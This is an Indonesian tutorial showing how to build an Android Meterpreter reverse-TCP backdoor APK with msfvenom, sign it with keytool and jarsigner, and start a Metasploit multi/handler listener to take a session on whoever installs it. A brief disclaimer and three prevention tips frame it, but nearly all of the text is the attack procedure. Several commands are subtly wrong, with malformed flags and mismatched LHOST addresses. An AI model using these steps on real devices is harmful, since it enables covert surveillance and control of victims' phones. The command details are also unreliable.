Belajar Android Hacking dengan Metasploit Di Tahun 2024
Disclaimer
Di artikel ini saya menjelaskan langkah-langkah untuk membuat payload android menggunakan Metasploit sebagai metode peretasan atas dasar pembelajaran untuk menambah wawasan dan mencegah terjadinya peretasan.
Saya menggunakan sistem operasi Windows, silakan pahami perbedaan dalam langkah-langkah jika menggunakan sistem operasi lain.
Download
Saat mengunduh OpenJDK, sesuaikan sistem operasi dan arsitektur komputer, lalu pilih Package Type: JDK. Sebelum instal Metasploit, silakan baca dokumentasi di website official-nya. Saat instalasi Metasploit, akan muncul satu atau lebih permintaan akses administrator saat proses instalasi berlangsung.
Metasploit
- Buka folder metasploit lewat cmd, C:\metasploit-framework (Jika tidak diubah saat instalasi)
- Untuk melihat perintah yang tersedia, jalankan perintah “ msfconsole`
- Untuk melihat list platform output yang tersedia, jalankan perintah
msfvenom --platform android/meterpreter/reverse_tcp –list plafroms
- Untuk melihat list arsitektur output yang tersedia, jalankan perintah
msfvenom --platform android/meterpreter/reverse_tcp –list aarchs
Payload
Jalankan perintah berikut untuk membuat payload pada platform android.
msfvenom --payload android/meterpreter/reverse_tcp –platform android –aarch dalvik LHOST=192.168.100.7 LPORT=4444 –out test.apk
LHOST adalah IP milik attacker dan LPORT adalah port yang akan digunakan sebagai listener dari attacker.
Salin output file berformat .apk di path C:\metasploit-framework ke dalam folder openjdk\bin. Lalu buka folder openjdk\bin lewat cmd, dan ikuti langkah berikut.
Sign APK
- Jalankan perintah ini untuk membuat keystore yang diperlukan untuk sign .apk
keytool -genkey -V -keystore key.keystore -alias test -keyalg RSA -keysize 2048 -validity 10000
- Jalankan perintah ini untuk sign .apk
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore test.apk test
- Jalankan perintah ini untuk mengecek .apk telah di-sign
jarsigner -verify -verbose -certs test.apk
Sampai langkah ini file .apk berisi payload sudah di-sign.
Monitoring
Jalankan perintah ini satu per-satu untuk memulai listener dengan pengaturan payload yang sudah dibuat di langkah sebelumnya.
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.100.1
set LPORT 4444
exploit
Sampai langkah ini listener sudah berjalan untuk memonitor. Jika aplikasi diinstal (Do with your own risk) dengan permission yang diizinkan lalu dijalankan (secara default), akan muncul sesi peretasan pada listener.
Peretasan
Jalankan perintah berikut pada listener untuk mengecek info sistem pada device yang sudah diinstal payload
sysinfo
Temukan perintah lainnya sebagai pembelajaran di dokumentasi pada website official Metasploit.
Pencegahan
Cara mencegah peretasan dengan metode aplikasi yang disusupi payload adalah
- Tidak mengunduh aplikasi dari situs atau aplikasi yang tidak resmi
- Selalu izinkan platform untuk melakukan scanning setiap kali aplikasi diinstal
- Memilah permission dengan hanya mengizinkan yang diperlukan dan menolak izin yang tidak masuk akal aplikasi tersebut